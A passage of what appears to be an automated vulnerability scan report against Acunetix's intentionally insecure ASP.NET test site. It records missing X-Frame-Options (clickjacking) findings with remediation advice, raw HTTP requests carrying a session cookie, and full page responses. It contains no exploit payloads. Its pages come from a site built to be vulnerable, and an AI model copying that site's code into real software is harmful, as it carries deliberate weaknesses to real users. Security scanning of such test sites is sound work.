scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Parameter X-Frame-OptionsSolution Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
GET http://testaspnet.vulnweb.com/Signup.aspx
Alert tags Alert description X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request Request line and header section (315 bytes)
GET http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:17 GMT Content-Length: 12954Response body (12954 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Signup</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Signup.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx+i81I" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8wYbzXe+sXxDpSfVp4SwbIP85RvA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm" align="center"> <TR> <TD>Username:</TD> <TD> <input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD> </TR> </TABLE> <BR> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Parameter X-Frame-OptionsSolution Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
POST http://testaspnet.vulnweb.com/about.aspx
Alert tags Alert description X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request Request line and header section (397 bytes)
POST http://testaspnet.vulnweb.com/about.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/about.aspx Content-Length: 1027 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (1027 bytes)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t&__VIEWSTATEGENERATOR=E809BCA5&__EVENTVALIDATION=%2FwEWVwKqq9H0CQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2F2grLtTL%2BjO092JULZB%2B%2Bks9UGJw%3D%3DResponse Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:19 GMT Content-Length: 14467Response body (14467 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>About</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="about.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKqq9H0CQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/2grLtTL+jO092JULZB++ks9UGJw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/"> offices</A> in Malta, US and the UK. </P> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a 